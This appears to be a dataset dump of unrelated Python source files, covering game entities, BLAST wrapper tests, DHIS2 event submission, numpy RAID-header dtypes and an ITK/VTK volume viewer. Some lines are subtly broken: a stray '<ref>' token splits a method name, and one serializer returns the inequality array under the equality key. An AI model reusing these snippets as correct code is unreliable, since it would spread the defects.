content stringlengths 5 1.05M |
|---|
from bullet import Bullet
from vector import Vector
import math
import random
class Entity:
def __init__(self, start_position: Vector, health: int, color):
self.color = color
self.position = start_position
self.health = health
class Player(Entity):
def __init__(self, start_position: Vector, power:int = 10):
super(self.__class__, self).__init__(start_position, 100, (255, 255, 255))
self.power = power
self.bullets = []
self.points = 0
self.width = 20
self.height = 20
def move_down(self):
v2 = Vector(0, 4)
self.position.add(v2)
def move_up(self):
v2 = Vector(0, -4)
self.position.add(v2)
def move_right(self):
v2 = Vector(4, 0)
self.position.add(v2)
def move_left(self):
v2 = Vector(-4, 0)
self.position.add(v2)
def add_bullet(self, position:Vector):
self.bullets.append(Bullet(position))
def level_up(self):
self.power += 10
class Enemy(Entity):
def __init__(self, start_position: Vector, power: int, movement:str = "rand"):
self.movement = movement
self.power = power
self.width = 15
self.height = 15
super(self.__class__, self).__init__(
Vector(
random.randrange(0 + self.width, 480 - self.width),
random.randrange(0 + self.height, 600 - self.height)
), 100 * self.power, (255, 0, 0)
)
self.delta_vector = Vector(int(math.cos(math.radians(self.position.x)) * 10) // 2,
int(math.sin(math.radians(self.position.y)) * 10) // 2)
def update_position(self):
self.position.add(self.delta_vector)
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Copyright (c) 2013--, biocore development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from string import split, strip
from os import popen, remove
from glob import glob
from unittest import TestCase, main
from cogent.parse.blast import QMEBlast9
from bfillings.blast import (seqs_to_stream, make_subject_match_scorer,
make_shotgun_scorer, keep_everything_scorer,
ids_from_seq_lower_threshold, PsiBlast,
psiblast_n_neighbors)
class BlastTests(TestCase):
"""Tests of top-level functions"""
def setUp(self):
"""Define some standard data"""
self.rec = """# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 2
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0
ece:Z4181 sfl:CP0138 33.98 103 57 2 8 110 6 97 6e-06 50.5
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
ece:Z4181 sec:SC2804 37.50 72 45 0 39 110 30 101 1e-05 49.8
ece:Z4181 stm:STM2872 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 ecs:ECs3718 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2422 41.67 72 42 0 39 110 29 100 2e-06 52.8""".split('\n')
self.rec2 = """# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4181 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 2
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4181 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8""".split('\n')
self.rec3 = """# BLASTP 2.2.10 [Oct-19-2004]
# BLASTP 2.2.10 [Oct-19-2004]
# Query: ece:Z4181
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4181 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4181 spt:SPA2730 37.50 72 45 0 39 110 30 101 1e-05 49.8
# BLASTP 2.2.10 [Oct-19-2004]
# Iteration: 1
# Query: ece:Z4182
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4182 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4182 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-06 52.8
# BLASTP 2.2.10 [Oct-19-2004]
# Query: ece:Z4183
# Database: db/everything.faa
# Fields: Query id, Subject id, % identity, alignment length, mismatches, gap openings, q. start, q. end, s. start, s. end, e-value, bit score
ece:Z4183 ece:Z4182 100.00 110 0 0 1 110 1 110 3e-47 187
ece:Z4183 ecs:ECs3717 100.00 110 0 0 1 110 1 110 3e-54 211
ece:Z4183 cvi:CV2421 41.67 72 42 0 39 110 29 100 2e-08 59.0""".split('\n')
self.query_1 = """>gi|100002553| Bd2556c Bd2556c two-component system sensor histidine kinase 3092017:3094158 reverse MW:81963
MRLKNRLNNWISIRMGMVIVIFLGVSCGSMRSSTPPPAKDRLTEIDSLERLLPDCPTIASTLPLLRRLAFLYQQQSEMKVYNERLYENAMAVDSISVAYLGLKNLAEYYYDQSVRDSLEYYCSLVDSIAKARHEYPNVLFDVKSLSSQDLLWLGNYELAMSEAMDLYRLASNLDHRYGLLRCSETLGLIYQRIRRDSDAVVSFQESLDLLKDIKDVPDIMDTKVRLTSYQLESSVRTKQYASTERILGQYMALLDEQYKIYQEKNDLLSIKREYWLLYSFYTSFYLSQGDLENAKRSLDQASSYADSNWVEGDYAINTYLTVKARYHKAAGDIPLALHCINEVLETERLPEDIQFKADILKEQGQLGEVMALYDELYSTLTKRRGTSFLRQVNQLRTLHELHEKELKETELKEAGQRIARKQDLLIFILSISVVLLILLYVLFLYYRHLRSLKNQLQREKELLLESQRQLIKEKTRAEEASLMKSAFLANMSHEVRTPLNAIVGFSGLLVEPSTDEEERKEYSSIIRNNTDLMLNLVNDVLDLSRMETGDLHFDIKDHLLLVCCQMALESVRHRIPDGVKLTFSPAGEPIVVHVDNLRLQQLLTNLLTNAAKFTEKGEINLSFQLEPDRKKVCIAVTDTGAGIPLEKQATIFNRFEKLDDYKPGVGLGLSICLLIAERLDGALFIDSSYTDGARFVLILSCEIDSSIYNPPIEV"""
self.query_2 = """>gi|100002557| Bd2560c Bd2560c conserved hypothetical protein 3097971:3098210 reverse MW:8927
MGKNQLIHGNEFHLLKQAEIHKATGKLVESLNLAAGSTGGFDIYKVVEAYFTDLEKRKEINDLLGISEPCETRVTEECFS
"""
self.fasta_recs = """>gi|100002550| Bd2553c Bd2553c conserved hypothetical protein 3090609:3091013 reverse MW:14682
MMDFISVPLVVGIVCAGIYGLFELFVRKRERLAIIEKIGDKLDTSAFDGKLGLPNYMRNFSFSSLKAGCLLAGIGLGLLVGFIINMCMATNSYYDDGWYRHEVAGTAYGASVLLFGGIGLIIAFVIELKLGKNNK
>gi|100002551| Bd2554 Bd2554 RNA polymerase ECF-type sigma factor 3091112:3091717 forward MW:23408
LLPQVVTYLPGLRPLSTMELYTDTYYIQRIQAGDVACFACLLDKYSRPIHSLILKVVRSQEEAEELAQDTFMKVFKNLASFKGDCSFSTWIYRIAYNTAISSVRKKRYEFLAIEETTLENVSEEEITNLFGQTESTEQVQRLEVALEQLLPDERALILLFYWKEKTIEELVSITGLTASNIKVKLHRIRKKLFVLLNGMDHE
>gi|100002552| Bd2555 Bd2555 conserved hypothetical protein 3091713:3092066 forward MW:13332
MSKINTNKEQPDLLGDLFKRIPEEELPASFRSNVMRQIMLESAKAKKRDERFSLLAAIVASLIMISLAIVSFVYMEIPKIAIPTISTSALAFYLYIGAITLILLLADYKLRNLFHKKG
>gi|100002553| Bd2556c Bd2556c two-component system sensor histidine kinase 3092017:3094158 reverse MW:81963
MRLKNRLNNWISIRMGMVIVIFLGVSCGSMRSSTPPPAKDRLTEIDSLERLLPDCPTIASTLPLLRRLAFLYQQQSEMKVYNERLYENAMAVDSISVAYLGLKNLAEYYYDQSVRDSLEYYCSLVDSIAKARHEYPNVLFDVKSLSSQDLLWLGNYELAMSEAMDLYRLASNLDHRYGLLRCSETLGLIYQRIRRDSDAVVSFQESLDLLKDIKDVPDIMDTKVRLTSYQLESSVRTKQYASTERILGQYMALLDEQYKIYQEKNDLLSIKREYWLLYSFYTSFYLSQGDLENAKRSLDQASSYADSNWVEGDYAINTYLTVKARYHKAAGDIPLALHCINEVLETERLPEDIQFKADILKEQGQLGEVMALYDELYSTLTKRRGTSFLRQVNQLRTLHELHEKELKETELKEAGQRIARKQDLLIFILSISVVLLILLYVLFLYYRHLRSLKNQLQREKELLLESQRQLIKEKTRAEEASLMKSAFLANMSHEVRTPLNAIVGFSGLLVEPSTDEEERKEYSSIIRNNTDLMLNLVNDVLDLSRMETGDLHFDIKDHLLLVCCQMALESVRHRIPDGVKLTFSPAGEPIVVHVDNLRLQQLLTNLLTNAAKFTEKGEINLSFQLEPDRKKVCIAVTDTGAGIPLEKQATIFNRFEKLDDYKPGVGLGLSICLLIAERLDGALFIDSSYTDGARFVLILSCEIDSSIYNPPIEV
>gi|100002554| Bd2557c Bd2557c two-component system sensor histidine kinase 3094158:3095507 reverse MW:51247
LERKYNGEGKIFPVKRHRCLMSCYYCELYTMKGNSGKAQAYLDQATAYLDSSFGDRVEAQYLRTKSFYYWKEKDYRHALSAVNLALKINRDLDKLEMKKAVLQSSGQLQEAVTIYEEIINKTETINTDAFDRQIEQLRVLNDLNDLEKQDRELKLKSEQEALKQKQIVVSIGLLLVLMGLLYMLWRIYMHTKRLRNELLQEKDSLTASEKQLRVVTKEAEAANKKKSAFIANISHEVRTPLNAIVGFSELLASSEYSEEEKIRFAGEVNHSSELLLNLVNDVLDLSRLESGKIKFSVKPNDLVACCQRALDSIRHRVKPGVRLTFTPSIESYTLNTDALRLQQLLTNLLSNAAKFTSEGEINLSFTVDEGKEEVCFSVTDTGCGIPEDKCEKIFERFEKLDDFIQGTGLGLSVCQIISEQLNGSLSVDISYKDGARFVFIHPTNLIETPI
>gi|100002555| Bd2558c Bd2558c hypothetical protein 3095527:3095985 reverse MW:17134
LRGKNIHLGRVGCNYGKLLIFIDIYFVSLRIVSDKSMSRGFLRKSSVNTFIGIVWILFAVGTSAQNAVSKFRADSIRQSLSRIQKPQDKIPLLKELIGLYWQLPEEVLALKEIIDIAMPLDSIGIVYDAMAGLSRYYPAIRTFVRVGGALETV
>gi|100002556| Bd2559 Bd2559 30S ribosomal protein S1 3096095:3097882 forward MW:67092
MENLKNIQPVEDFNWDAFEQGETYTEVSKDDLVKTYDETLNTVKDKEVVMGTVTSMNKREVVVNIGFKSDGVVPMSEFRYNPDLKIGDEVEVYIESQEDKKGQLILSHKKARATRSWDRVNEALEKDEIIKGYIKCRTKGGMIVDVFGIEAFLPGSQIDVKPIRDYDVFVGKTMEFKIVKINQEFKNVVVSHKALIEAELEQQKKDIISKLEKGQVLEGTVKNITSYGVFIDLGGVDGLIHITDLSWGRVSHPEEIVQLDQKINVVILDFDDEKKRIALGLKQLTPHPWDALDTNLKVGDKVKGKVVVMADYGAFIEIAPGVEGLIHVSEMSWTQHLRSAQDFMKVGDEIEAVILTLDRDERKMSLGIKQLKADPWENIEERFPVGSRHAAKVRNFTNFGVFVEIEEGVDGLIHISDLSWTKKIKHPSEFTQIGAEIEVQVLEIDKENRRLSLGHKQLEENPWDVFETIFTVGSIHEGTIIEVLDKGAVISLPYGVEGFATPKHLVKEDGSQAQVDEKLSFKVIEFNKEAKRIILSHSRIFEDEQKGAKATSEKKASSKRGGKKEEESGMVTGPVEKTTLGDIEELAALKEKLSGK
>gi|100002557| Bd2560c Bd2560c conserved hypothetical protein 3097971:3098210 reverse MW:8927
MGKNQLIHGNEFHLLKQAEIHKATGKLVESLNLAAGSTGGFDIYKVVEAYFTDLEKRKEINDLLGISEPCETRVTEECFS
>gi|100002558| Bd2561 Bd2561 phosphoglycolate phosphatase 3098389:3099033 forward MW:24182
MKKLVIFDLDGTLLNTIADLAHSTNHALRQNGFPTHDVKEYNFFVGNGINKLFERALPEGEKTAENILKVREEFLKHYDLHNTDRSVPYPGVPELLALLQERGIKLAVASNKYQAATRKLIAHFFPSIQFTEVLGQREGVKAKPDPSIVNEIVERASISKESTLYVGDSDVDMQTAINSEVTSCGVTWGFRPRTELEKYAPDHIAEKAEDILKFI
>gi|100002559| Bd2562 Bd2562 conserved hypothetical protein 3099382:3100299 forward MW:35872
MSGNIKKIVEPNSGIDYSLEKDFKIFTLSKELPITTYPSYIRLGIVIYCVKGNAKIDIYSNKHIITPKELIIILPGQLVALTDVSVDFQIRYFTITESFYSDILSGISRFSPHFFFYMRQHYYFKMEDVETLSFVDFFELLIRKAVDPENQYRRESVILLLRILFLDIYNHYKVNSLDSTATIDVHKKELTHKFFQLVMSNYKVNRSVTFYANSLCITPKYLTMVVKEVSGKSAKDWITEYMILELKGLLTNSTLNIQEIVEKTQFSNQSSLGRFFRRHTGLSPLQYRKKYLTTEQRTNFSKNNTI
"""
def test_seqs_to_stream(self):
"""seqs_to_stream should iterate over seqs"""
sts = seqs_to_stream
self.assertEqual(list(sts('>a\nTG\n>b\nWW\n', \
'_input_as_multiline_string')),\
[['>a','TG'],['>b','WW']])
#skipping test for file open
self.assertEqual(list(sts(['TG','WW'], '_input_as_seqs')), \
[['>0','TG'],['>1','WW']])
self.assertEqual(list(sts(['>a','TG','>b','WW'], \
'_input_as_lines')),\
[['>a','TG'],['>b','WW']])
self.assertRaises(TypeError, sts, 'abc', 'xyz')
def test_make_subject_match_scorer(self):
"""make_subject_match_scorer should keep ids matching n queries"""
qm1 = make_subject_match_scorer(1)
qm3 = make_subject_match_scorer(3)
qm5 = make_subject_match_scorer(5)
qmes = wrap_qmes(QMEBlast9(self.rec3))
self.assertItemsEqual(qm1(qmes), ['ece:Z4181','ece:Z4182','ece:Z4183'])
self.assertItemsEqual(qm3(qmes), ['ece:Z4181','ece:Z4183'])
self.assertItemsEqual(qm5(qmes), [])
def test_make_shotgun_scorer(self):
"""make_shotgun_scorer should keep ids matching n queries"""
sg1 = make_shotgun_scorer(1)
sg2 = make_shotgun_scorer(2)
sg3 = make_shotgun_scorer(3)
sg4 = make_shotgun_scorer(4)
sg5 = make_shotgun_scorer(5)
qmes = wrap_qmes(QMEBlast9(self.rec3))
self.assertItemsEqual(sg1(qmes), keep_everything_scorer(qmes))
self.assertItemsEqual(sg2(qmes), \
['ece:Z4181','ece:Z4182','ece:Z4183','cvi:CV2421','ecs:ECs3717'])
self.assertItemsEqual(sg3(qmes), \
['ece:Z4181','ece:Z4182','ece:Z4183'])
self.assertItemsEqual(sg4(qmes), \
['ece:Z4182'])
self.assertItemsEqual(sg5(qmes), [])
def test_keep_everything_scorer(self):
"""keep_everything_scorer should keep all ids found."""
k = keep_everything_scorer(wrap_qmes(QMEBlast9(self.rec2)))
self.assertItemsEqual(k, \
['ece:Z4181','ecs:ECs3717','spt:SPA2730','cvi:CV2421','ece:Z4182'])
def test_ids_from_seq_lower_threshold(self):
"ids_from_seq_lower_threshold returns psiblast hits, decreasing sens"
bdb_seqs = self.fasta_recs
f = open('test_bdb', 'w')
f.write(bdb_seqs)
f.close()
temp = popen('formatdb -i test_bdb -o T -p T')
params = {'-j':2,
'-d':'test_bdb'}
query = self.query_1.split('\n')
app = PsiBlast(params=params,
InputHandler='_input_as_lines')
#the command below should result in finding itself and 2554
#it should run for max_iterations
result = ids_from_seq_lower_threshold(query, n=12, \
max_iterations=4, app=app, core_threshold=1e-50, \
lower_threshold=1e-20, step=10000)
self.assertEqual(result[0],\
[('gi|100002553', '0.0'), ('gi|100002554', '0.0')])
self.assertEqual(result[1], 4)
#if n=2, it should find the same sequences but only run for 1 iteration
#since it would hit n after the first blast search
result = ids_from_seq_lower_threshold(query, n=2, \
max_iterations=4, app=app, core_threshold=1e-50, \
lower_threshold=1e-20, step=10000)
self.assertEqual(result[0],\
[('gi|100002553', '0.0'), ('gi|100002554', '0.0')])
self.assertEqual(result[1], 1)
query = self.query_2.split('\n')
#query_2_s e-value for itself is 9e-47, it should not be found
#with the lower_threshold set to 1e-48
result = ids_from_seq_lower_threshold(query, n=12, \
max_iterations=4, app=app, core_threshold=1e-50, \
lower_threshold=1e-48, step=10000)
self.assertEqual(result[0], [])
#it also should not be found if the max_iterations is set to 1
result = ids_from_seq_lower_threshold(query, n=12, \
max_iterations=1, app=app, core_threshold=1e-50, \
lower_threshold=1e-20, step=10000)
self.assertEqual(result[0], [])
for fname in ['formatdb.log'] + glob('test_bdb*'):
remove(fname)
def test_psiblast_n_neighbors(self):
"psiblast_n_neighbors psiblasts and stops when n neighbors are reached"
bdb_seqs = self.fasta_recs
f = open('test_bdb', 'w')
f.write(bdb_seqs)
f.close()
temp = popen('formatdb -i test_bdb -o T -p T')
params = {'-j':11}
lines = bdb_seqs.split('\n')
results = psiblast_n_neighbors(lines, n=12, blast_db='test_bdb', \
method='lower_threshold', params=params,\
core_threshold=1e-50, step=10000)
#there should be 10 result entries since there were 10 queries
self.assertEqual(len(results), 10)
for i in results:
#each query should at least find itself
self.failUnless(len(results[i][0]) >= 1)
#each query should iterate 8 times since it can never reach max
self.assertEqual(results[i][1], 11)
for fname in ['formatdb.log'] + glob('test_bdb*'):
remove(fname)
def wrap_qmes(qmes):
"""Converts qmes into a dict of {q:{m:e}}"""
d = {}
for q, m, e in qmes:
if q not in d:
d[q] = {}
d[q][m] = e
return d
if __name__ == "__main__":
main()
|
'''
Find the sum of the digits in the number 100!
'''
def fact(n):
return 1 if n <= 1 else n*fact(n-1)
print(sum(map(int, [x for x in str(fact(100))]))) |
from java import util
class MyList(util.ArrayList):
def calc_size(self):
return self.si<ref>ze() |
# Font generation script from Ionicons
# https://github.com/driftyco/ionicons/
# http://ionicons.com/
from subprocess import call
import os
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
def main():
generate_font_files()
def generate_font_files():
print "Generate Fonts"
cmd = "fontforge -script %s/generate_font.py" % (BUILDER_PATH)
call(cmd, shell=True)
if __name__ == "__main__":
main()
|
import numpy as np
align_to_nbytes = 512
max_raidfile_entries = 64
# 8B
MrParcRaidFileHeader = [("hdSize_", "<u4"), # ID???
("count_", "<u4")] # # of meas
# 152B
MrParcRaidFileEntry = [("measId_", "<u4"), # MeasID
("fileId_", "<u4"), # FileID
("off_", "<u8"), # Measurement offset
("len_", "<u8"), # Measurement length
("patName_", "<S64"), # Patient name
("protName_", "<S64")] # Protocol name
# 9736B
MultiRaidFileHeader = [("hdr", MrParcRaidFileHeader),
("entry", (MrParcRaidFileEntry, 64))]
MultiRaidFileHeader = np.dtype(MultiRaidFileHeader)
MrParcRaidFileHeader = np.dtype(MrParcRaidFileHeader)
MrParcRaidFileEntry = np.dtype(MrParcRaidFileEntry)
SingleMeasInit = [("hdr_len", "<u4"),
("unknown", "<u4")] # usually value 4
SingleMeasInit = np.dtype(SingleMeasInit)
|
from schema import Optional as SchemaOptional, SchemaError
from schema import Regex, Schema
from corehq.motech.dhis2.const import DHIS2_API_VERSION
from corehq.motech.exceptions import ConfigurationError
from corehq.motech.value_source import (
CaseTriggerInfo,
get_form_question_values,
get_value,
)
def send_dhis2_event(request, form_config, payload):
event = get_event(request.domain_name, form_config, payload)
validate_event_schema(event)
return request.post('/api/%s/events' % DHIS2_API_VERSION, json=event,
raise_for_status=True)
def get_event(domain, config, form_json):
info = CaseTriggerInfo(
domain=domain,
case_id=None,
form_question_values=get_form_question_values(form_json),
)
event = {}
event_property_functions = [
_get_program,
_get_org_unit,
_get_event_date,
_get_event_status,
_get_completed_date,
_get_datavalues,
]
for func in event_property_functions:
event.update(func(config, info))
return event
def _get_program(config, case_trigger_info):
return {'program': config.program_id}
def _get_org_unit(config, case_trigger_info):
org_unit_id = None
if config.org_unit_id:
org_unit_id = get_value(config.org_unit_id, case_trigger_info)
if org_unit_id:
return {'orgUnit': org_unit_id}
return {}
def _get_event_date(config, case_trigger_info):
event_date = get_value(config.event_date, case_trigger_info)
return {'eventDate': event_date}
def _get_event_status(config, case_trigger_info):
return {'status': config.event_status}
def _get_completed_date(config, case_trigger_info):
completed_date = None
if config.completed_date:
completed_date = get_value(config.completed_date, case_trigger_info)
if completed_date:
return {'completedDate': completed_date}
return {}
def _get_datavalues(config, case_trigger_info):
values = []
for data_value in config.datavalue_maps:
values.append({
'dataElement': data_value.data_element_id,
'value': get_value(data_value.value, case_trigger_info)
})
return {'dataValues': values}
def validate_event_schema(event):
"""
Raises ConfigurationError if ``event`` is missing required
properties, or value data types are invalid.
"""
try:
Schema(get_event_schema()).validate(event)
except SchemaError as err:
raise ConfigurationError from err
def get_event_schema() -> dict:
"""
Returns the schema for a DHIS2 Event.
>>> event = {
... "program": "eBAyeGv0exc",
... "orgUnit": "DiszpKrYNg8",
... "eventDate": "2013-05-17",
... "status": "COMPLETED",
... "completedDate": "2013-05-18",
... "storedBy": "admin",
... "coordinate": {
... "latitude": 59.8,
... "longitude": 10.9
... },
... "dataValues": [
... { "dataElement": "qrur9Dvnyt5", "value": "22" },
... { "dataElement": "oZg33kd9taw", "value": "Male" },
... { "dataElement": "msodh3rEMJa", "value": "2013-05-18" }
... ]
... }
>>> Schema(get_event_schema()).is_valid(event)
True
"""
date_str = Regex(r"^\d{4}-\d{2}-\d{2}$")
dhis2_id_str = Regex(r"^[A-Za-z0-9]+$") # (ASCII \w without underscore)
return {
"program": dhis2_id_str,
"orgUnit": dhis2_id_str,
"eventDate": date_str,
SchemaOptional("completedDate"): date_str,
SchemaOptional("status"): Regex("^(ACTIVE|COMPLETED|VISITED|SCHEDULE|OVERDUE|SKIPPED)$"),
SchemaOptional("storedBy"): str,
SchemaOptional("coordinate"): {
"latitude": float,
"longitude": float,
},
SchemaOptional("geometry"): {
"type": str,
"coordinates": [float],
},
SchemaOptional("assignedUser"): dhis2_id_str,
"dataValues": [{
"dataElement": dhis2_id_str,
"value": object,
}],
}
|
from typing import Any, Optional, Dict
from dataclasses import dataclass
import json
from numpy import ndarray
from optmlstat.formatting import convert_data_for_json
@dataclass(frozen=True)
class OptimizationProblemEvaluation:
opt_prob: Any
x_array_2d: ndarray
obj_fcn_array_2d: Optional[ndarray] = None
ineq_cnst_array_2d: Optional[ndarray] = None
eq_cnst_array_2d: Optional[ndarray] = None
def to_json_data(self) -> Dict[str, Any]:
return dict(
opt_prob=self.opt_prob,
x_array_2d=self.x_array_2d,
obj_fcn_array_2d=self.obj_fcn_array_2d,
ineq_cnst_array_2d=self.ineq_cnst_array_2d,
eq_cnst_array_2d=self.ineq_cnst_array_2d,
)
def __repr__(self) -> str:
return json.dumps(self.to_json_data(), indent=2, default=convert_data_for_json)
|
# display scalar images in volume
class show3D :
def __init__(self, input=None, MinOpacity=0.0, MaxOpacity=0.1) :
import qt
import vtk
from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
self.__MinOpacity__ = MinOpacity
self.__MaxOpacity__ = MaxOpacity
# every QT app needs an app
self.__app__ = qt.QApplication(['itkviewer'])
# create the widget
self.__widget__ = QVTKRenderWindowInteractor()
self.__ren__ = vtk.vtkRenderer()
self.__widget__.GetRenderWindow().AddRenderer(self.__ren__)
self.__itkvtkConverter__ = None
self.__volumeMapper__ = vtk.vtkVolumeTextureMapper2D()
self.__volume__ = vtk.vtkVolume()
self.__volumeProperty__ = vtk.vtkVolumeProperty()
self.__volume__.SetMapper(self.__volumeMapper__)
self.__volume__.SetProperty(self.__volumeProperty__)
self.__ren__.AddVolume(self.__volume__)
self.__outline__ = None
self.__outlineMapper__ = None
self.__outlineActor__ = None
self.AdaptColorAndOpacity(0, 255)
if input :
self.SetInput(input)
self.AdaptColorAndOpacity()
def Render(self):
self.__widget__.GetRenderWindow().Render()
def GetWidget(self) :
return self.__widget__
def GetRenderer(self) :
return self.__ren__
def GetConverter(self) :
return self.__itkvtkConverter__
def GetVolumeMapper(self) :
return self.__volumeMapper__
def GetVolume(self) :
return self.__volume__
def GetVolumeProperty(self) :
return self.__volumeProperty__
def Show(self) :
self.__widget__.show()
def Hide(self) :
self.__widget__.hide()
def SetInput(self, input) :
import itk
img = itk.image(input)
self.__input__ = img
if img :
# Update to try to avoid to exit if a c++ exception is throwed
# sadely, it will not prevent the program to exit later...
# a real fix would be to wrap c++ exception in vtk
img.UpdateOutputInformation()
img.Update()
# flip the image to get the same representation than the vtk one
self.__flipper__ = itk.FlipImageFilter[img].New(Input=img)
axes = self.__flipper__.GetFlipAxes()
axes.SetElement(1, True)
self.__flipper__.SetFlipAxes(axes)
# change the spacing while still keeping the ratio to workaround vtk bug
# when spacing is very small
spacing_ = itk.spacing(img)
normSpacing = []
for i in range(0, spacing_.Size()):
normSpacing.append( spacing_.GetElement(i) / spacing_.GetElement(0) )
self.__changeInfo__ = itk.ChangeInformationImageFilter[img].New(self.__flipper__, OutputSpacing=normSpacing, ChangeSpacing=True)
# now really convert the data
self.__itkvtkConverter__ = itk.ImageToVTKImageFilter[img].New(self.__changeInfo__)
self.__volumeMapper__.SetInput(self.__itkvtkConverter__.GetOutput())
# needed to avoid warnings
# self.__itkvtkConverter__.GetOutput() must be callable
import vtk
if not self.__outline__ :
self.__outline__ = vtk.vtkOutlineFilter()
self.__outline__.SetInput(self.__itkvtkConverter__.GetOutput())
self.__outlineMapper__ = vtk.vtkPolyDataMapper()
self.__outlineMapper__.SetInput(self.__outline__.GetOutput())
self.__outlineActor__ = vtk.vtkActor()
self.__outlineActor__.SetMapper(self.__outlineMapper__)
self.__ren__.AddActor(self.__outlineActor__)
else :
self.__outline__.SetInput(self.__itkvtkConverter__.GetOutput())
self.Render()
def __call__(self, input) :
""" a short cut for SetInput()"""
self.SetInput( input )
def GetInput(self):
return self.__input__
def AdaptColorAndOpacity(self, minVal=None, maxVal=None):
if minVal == None or maxVal == None :
m, M = self.GetRange()
if minVal == None :
minVal = m
if maxVal == None :
maxVal = M
self.AdaptOpacity(minVal, maxVal)
self.AdaptColor(minVal, maxVal)
def AdaptOpacity(self, minVal=None, maxVal=None) :
import vtk
if minVal == None or maxVal == None :
m, M = self.GetRange()
if minVal == None :
minVal = m
if maxVal == None :
maxVal = M
opacityTransferFunction = vtk.vtkPiecewiseFunction()
opacityTransferFunction.AddPoint(minVal, self.__MinOpacity__)
opacityTransferFunction.AddPoint(maxVal, self.__MaxOpacity__)
self.__volumeProperty__.SetScalarOpacity(opacityTransferFunction)
def AdaptColor(self, minVal=None, maxVal=None):
import vtk
if minVal == None or maxVal == None :
m, M = self.GetRange()
if minVal == None :
minVal = m
if maxVal == None :
maxVal = M
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.AddHSVPoint(minVal, 0.0, 0.0, 0.0)
colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.25, 0.66, 1.0, 1.0)
colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.5, 0.44, 1.0, 1.0)
colorTransferFunction.AddHSVPoint((maxVal-minVal)*0.75, 0.22, 1.0, 1.0)
colorTransferFunction.AddHSVPoint(maxVal, 0.0, 1.0, 1.0)
self.__volumeProperty__.SetColor(colorTransferFunction)
self.Render()
def GetRange(self) :
conv = self.GetConverter()
conv.Update()
return conv.GetOutput().GetScalarRange()
def GetMaxOpacity(self) :
return self.__MaxOpacity__
def GetMinOpacity(self) :
return self.__MinOpacity__
def SetMaxOpacity(self, val) :
self.__MaxOpacity__ = val
self.AdaptColorAndOpacity()
def SetMinOpacity(self, val) :
self.__MinOpacity__ = val
self.AdaptColorAndOpacity()
import itkExtras
class lsm( itkExtras.pipeline ):
""" Use vtk to import LSM image in ITK.
"""
def __init__(self, fileName=None, channel=0, ImageType=None ):
from vtk import vtkLSMReader, vtkImageCast
import itk
itk.pipeline.__init__(self)
# if ImageType is None, give it a default value
# this is useful to avoid loading Base while loading this module
if ImageType == None:
ImageType = itk.Image.UC3
# remove useless SetInput() method created by the constructor of the pipeline class
# del self.SetInput
# set up the pipeline
self.connect( vtkLSMReader() )
self.connect( vtkImageCast() )
PType = itk.template(ImageType)[1][0]
if PType == itk.UC:
self[-1].SetOutputScalarTypeToUnsignedChar()
elif PType == itk.US:
self[-1].SetOutputScalarTypeToUnsignedShort()
self.connect( itk.VTKImageToImageFilter[ImageType].New() )
